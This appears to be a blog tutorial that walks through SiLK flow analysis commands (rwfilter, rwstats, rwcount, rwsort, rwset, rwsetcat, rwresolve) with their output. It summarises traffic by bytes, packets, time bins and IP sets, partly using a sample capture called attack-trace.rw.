<p></p><p>Grab the top 5 bins within a 5 minutes span. Group by bytes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--end-date=2022/05/01 --pass=stdout --max-pass=100 | rwstats --field=stime,sIP \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--count=5 --values=bytes --bin-time=300</b></span>
<span style="color: white;">INPUT: 100 Records for 5 Bins and 17964 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;">2022/02/08T14:40:00| 8.8.8.8| 13785| 76.736807| 76.736807|</span>
<span style="color: white;">2022/02/08T14:35:00| 8.8.8.8| 2166| 12.057448| 88.794255|</span>
<span style="color: white;">2022/02/08T14:25:00| 8.8.8.8| 1101| 6.128925| 94.923180|</span>
<span style="color: white;">2022/02/08T14:30:00| 8.8.8.8| 836| 4.653752| 99.576932|</span>
<span style="color: white;">2022/02/08T14:40:00| 17.253.26.125| 76| 0.423068|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Top 5 records by <i>bytes. <br /><!--HTML generated using hilite.me--></i></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 5287991 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;">pro| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 6| 5142342| 97.245665| 97.245665|</span>
<span style="color: white;"> 17| 134037| 2.534743| 99.780408|</span>
<span style="color: white;"> 1| 11500| 0.217474| 99.997882|</span>
<span style="color: white;"> 58| 112| 0.002118|100.000000|</span>
</pre></td></tr></tbody></table></div><i>
</i><p></p><p>Top 5 records by packets<i>.</i></p><p><i><!--HTML generated using hilite.me--></i></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --values=packets \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 10277 Total Packets</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Packets</span>
<span style="color: white;">pro| Packets| %Packets| cumul_%|</span>
<span style="color: white;"> 6| 9235| 89.860854| 89.860854|</span>
<span style="color: white;"> 17| 915| 8.903376| 98.764231|</span>
<span style="color: white;"> 1| 125| 1.216308| 99.980539|</span>
<span style="color: white;"> 58| 2| 0.019461|100.000000|</span>
</pre></td></tr></tbody></table></div><i>
</i><p></p><p></p><p style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><i><!--HTML generated using hilite.me--></i></p><p></p><p style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; widows: 2;"><span style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">Top 5 records, by </span>records which are the default when no values are specified.</p><p style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; widows: 2;"><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=0- --start-date=2022/01/01 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --max-pass=1000 | rwstats --field=protocol --count=5 --bin-time=300</b></span>
<span style="color: white;">INPUT: 1000 Records for 4 Bins and 1000 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;">pro| Records| %Records| cumul_%|</span>
<span style="color: white;"> 17| 886| 88.600000| 88.600000|</span>
<span style="color: white;"> 6| 109| 10.900000| 99.500000|</span>
<span style="color: white;"> 1| 3| 0.300000| 99.800000|</span>
<span style="color: white;"> 58| 2| 0.200000|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p><i><!--HTML generated using hilite.me--></i></p><div>Get the overall stats via summary parameters</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --overall-stats | more</span></b></span>
<span style="color: white;">FLOW STATISTICS--ALL PROTOCOLS: 12 records</span>
<span style="color: white;">*BYTES min 40; max 165088</span>
<span style="color: white;"> quartiles LQ 150.00000 Med 504.00000 UQ 4000.00000 UQ-LQ 3850.00000</span>
<span style="color: white;"> interval_max|count<=max|%_of_input| cumul_%|</span>
<span style="color: white;"> 40| 1| 8.333333| 8.333333|</span>
<span style="color: white;"> 60| 1| 8.333333| 16.666667|</span>
<span style="color: white;"> 100| 0| 0.000000| 16.666667|</span>
<span style="color: white;"> 150| 1| 8.333333| 25.000000|</span>
<span style="color: white;"> 256| 2| 16.666667| 41.666667|</span>
<span style="color: white;"> 1000| 3| 25.000000| 66.666667|</span>
<span style="color: white;"> 10000| 3| 25.000000| 91.666667|</span>
<span style="color: white;"> 100000| 0| 0.000000| 91.666667|</span>
<span style="color: white;"> 1000000| 1| 8.333333|100.000000|</span>
<span style="color: white;"> 4294967295| 0| 0.000000|100.000000|</span>
<span style="color: white;">*PACKETS min 1; max 159</span>
<span style="color: white;"> quartiles LQ 3.00000 Med 10.00000 UQ 17.50000 UQ-LQ 14.50000</span>
<span style="color: white;"> interval_max|count<=max|%_of_input| cumul_%|</span>
<span style="color: white;"> 3| 3| 25.000000| 25.000000|</span>
<span style="color: white;"> 4| 1| 8.333333| 33.333333|</span>
<span style="color: white;"> 10| 2| 16.666667| 50.000000|</span>
<span style="color: white;"> 20| 4| 33.333333| 83.333333|</span>
<span style="color: white;"> 50| 0| 0.000000| 83.333333|</span>
<span style="color: white;"> 100| 0| 0.000000| 83.333333|</span>
<span style="color: white;"> 500| 2| 16.666667|100.000000|</span>
<span style="color: white;"> 1000| 0| 0.000000|100.000000|</span>
<span style="color: white;"> 10000| 0| 0.000000|100.000000|</span>
<span style="color: white;"> 4294967295| 0| 0.000000|100.000000|</span>
</pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">...</span></pre></td></tr></tbody></table></div>
<p></p><p>Look at the top 5 by bytes, this time includes the "distinct"/unique source and destination IPs.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --count=5 --fields=bytes --values=bytes,distinct:sip,dip</span></b></span>
<span style="color: white;">INPUT: 12 Records for 12 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> bytes| Bytes| sIP-Distinct| dIP-Distinct| %Bytes| cumul_%|</span>
<span style="color: white;"> 165088| 165088| 1| 1| 92.454679| 92.454679|</span>
<span style="color: white;"> 4777| 4777| 1| 1| 2.675276| 95.129956|</span>
<span style="color: white;"> 4488| 4488| 1| 1| 2.513427| 97.643382|</span>
<span style="color: white;"> 1590| 1590| 1| 1| 0.890452| 98.533834|</span>
<span style="color: white;"> 801| 801| 1| 1| 0.448586| 98.982421|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Set a threshold for the number of records that must be found before a flow can be reported.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=6 --fields=sIP</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 12 Total Records</span>
<span style="color: white;">OUTPUT: Top 2 bins by Records (threshold 6)</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 6| 50.000000| 50.000000|</span>
<span style="color: white;"> 192.150.11.111| 6| 50.000000|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Set a threshold for the number of bytes that must be match in a flow to 1500.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=1500 --fields=sIP --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 2 bins by Bytes (threshold 1500)</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 171264| 95.913441| 95.913441|</span>
<span style="color: white;"> 192.150.11.111| 7297| 4.086559|100.000000|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Both records above match that criterion. Let's change this to a threshold of 7298 to get just one record.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=7298 --fields=sIP --values=bytes</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 1 bins by Bytes (threshold 7298)</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 98.114.205.102| 171264| 95.913441| 95.913441|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Above shows, with our threshold, only one record was returned. Removing the two right most columns. The percentage fields.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwstats attack-trace.rw --threshold=7298 --fields=sIP \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--values=bytes --no-percents</span></b></span>
<span style="color: white;">INPUT: 12 Records for 2 Bins and 178561 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 1 bins by Bytes (threshold 7298)</span>
<span style="color: white;"> sIP| Bytes|</span>
<span style="color: white;"> 98.114.205.102| 171264|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Characterizing traffic by time. view records in 20 seconds buckets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw --bin-size=20</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:20| 8.26| 100551.36| 212.18|</span>
<span style="color: white;">2019/04/20T03:28:40| 3.74| 78009.64| 135.82|</span>
</pre></td></tr></tbody></table></div>
<p></p><p><b>rwcount </b>default bin size is 30 seconds.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:00| 2.60| 2218.09| 16.36|</span>
<span style="color: white;">2019/04/20T03:28:30| 9.40| 176342.91| 331.64|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>You can skip flows with zero bytes, flows or packets by using <i>--skip-zeroes</i>. I don't have any 0s below. At the same time, I've changed the <i>--bin-size</i> to 20 seconds rather than the default 30.<br /><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcount attack-trace.rw --bin-size=20 --skip-zeroes</span></b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2019/04/20T03:28:20| 8.26| 100551.36| 212.18|</span>
<span style="color: white;">2019/04/20T03:28:40| 3.74| 78009.64| 135.82|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Reverse sort all records by destination IP, protocol and bytes. <b><i>rwsort </i></b>binary output cannot be written to the screen. Hence the pipe to <b><i>rwcut</i></b>. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsort attack-trace.rw --fields=dip,protocol,bytes \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--reverse | rwcut --fields=dip,protocol,bytes,stime</span></b></span>
<span style="color: white;">--num-recs=10 --ipv6-policy=ignore</span>
<span style="color: white;"> dIP|pro| bytes| sTime|</span>
<span style="color: white;"> 192.150.11.111| 6| 165088|2019/04/20T03:28:34.516|</span>
<span style="color: white;"> 192.150.11.111| 6| 4777|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 192.150.11.111| 6| 798|2019/04/20T03:28:33.576|</span>
<span style="color: white;"> 192.150.11.111| 6| 381|2019/04/20T03:28:30.466|</span>
<span style="color: white;"> 192.150.11.111| 6| 168|2019/04/20T03:28:28.374|</span>
<span style="color: white;"> 192.150.11.111| 6| 52|2019/04/20T03:28:44.593|</span>
<span style="color: white;"> 98.114.205.102| 6| 4488|2019/04/20T03:28:34.517|</span>
<span style="color: white;"> 98.114.205.102| 6| 1590|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 801|2019/04/20T03:28:33.457|</span>
<span style="color: white;"> 98.114.205.102| 6| 250|2019/04/20T03:28:30.466|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Perform the reverse sort based on the bytes.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsort attack-trace.rw --fields=bytes,dip,protocol --reverse | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=dip,protocol,bytes,stime --num-recs=10 --ipv6-policy=ignore</b></span>
<span style="color: white;"> dIP|pro| bytes| sTime|</span>
<span style="color: white;"> 192.150.11.111| 6| 165088|2019/04/20T03:28:34.516|</span>
<span style="color: white;"> 192.150.11.111| 6| 4777|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 4488|2019/04/20T03:28:34.517|</span>
<span style="color: white;"> 98.114.205.102| 6| 1590|2019/04/20T03:28:28.509|</span>
<span style="color: white;"> 98.114.205.102| 6| 801|2019/04/20T03:28:33.457|</span>
<span style="color: white;"> 192.150.11.111| 6| 798|2019/04/20T03:28:33.576|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Create a set of IP addresses from flow data using a combination of <b><i>rwfilter </i></b>and <b><i>rwset</i></b>. This can be used for export from flow and import into other security tools such as SIEM, Firewall, etc.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --type=all --pass=stdout --proto=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--start-date=2022/04/1T00 --end-date=2022/04/04 --bytes-per-packet=70 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-pass=100 | rwset --any-file=ip_from_flow.set</b></span>
</pre></td></tr></tbody></table></div>
<p></p><p>Validate the exported records, by leveraging <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip_from_flow.set</span></b></span>
<span style="color: white;">8.8.8.8</span>
<span style="color: white;">18.118.192.126</span>
<span style="color: white;">34.193.254.175</span>
<span style="color: white;">35.168.220.189</span>
<span style="color: white;">172.28.10.137</span>
<span style="color: white;">172.28.30.2</span>
<span style="color: white;">172.28.50.2</span>
<span style="color: white;">192.225.158.1</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Reverse this process, using <b><i>rwsetbuild</i></b>. Create a set of IPs from a txt file. This can be used for ignoring future flows via an allow/permit list.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetbuild --ip-ranges ip.txt ip.set</span></b></span><b><span style="color: #fcff01;">
</span></b></pre></td></tr></tbody></table></div>
<p></p><p>Read the created set via <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set</span></b></span>
<span style="color: white;">1.1.1.1</span>
<span style="color: white;">2.2.2.2</span>
<span style="color: white;">3.3.3.3</span>
<span style="color: white;">4.4.4.4</span>
<span style="color: white;">5.5.5.5</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get statistics on the IP addresses.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat --print-statistics ip.set</span></b></span>
<span style="color: white;">Network Summary</span>
<span style="color: white;"> minimumIP = 1.1.1.1</span>
<span style="color: white;"> maximumIP = 5.5.5.5</span>
<span style="color: white;"> 5 hosts (/32s), 0.000000% of 2^32</span>
<span style="color: white;"> 5 occupied /8s, 1.953125% of 2^8</span>
<span style="color: white;"> 5 occupied /16s, 0.007629% of 2^16</span>
<span style="color: white;"> 5 occupied /24s, 0.000030% of 2^24</span>
<span style="color: white;"> 5 occupied /27s, 0.000004% of 2^27</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get a snapshot view of the network structure with <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set --network-structure</span></b></span>
<span style="color: white;">TOTAL| 5 hosts in 5 /8s, 5 /16s, 5 /24s, and 5 /27s</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Get a different view of the network structure with <b><i>rwsetcat</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set --network-structure=24</span></b></span>
<span style="color: white;"> 1.1.1.0/24| 1</span>
<span style="color: white;"> 2.2.2.0/24| 1</span>
<span style="color: white;"> 3.3.3.0/24| 1</span>
<span style="color: white;"> 4.4.4.0/24| 1</span>
<span style="color: white;"> 5.5.5.0/24| 1</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Do a resolve IP addresses to host names using <b><i>rwresolve</i></b>, taking the data from <b><i>rwsetcat </i></b>output.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set | rwresolve</span></b></span>
<span style="color: white;">one.one.one.one</span>
<span style="color: white;">2.2.2.2</span>
<span style="color: white;">3.3.3.3</span>
<span style="color: white;">4.4.4.4</span>
<span style="color: white;">dynamic-005-005-005-005.5.5.pool.telefonica.de</span>
</pre></td></tr></tbody></table></div>
<p></p><p>About to do another resolve. Review the data first via <b><i>rwcut</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5 --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Doing the resolve by specifying the <i>getnameinfo</i> resolver.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5 --ipv6-policy=ignore | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwresolve --ip-fields=1,2 --resolver=getnameinfo</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
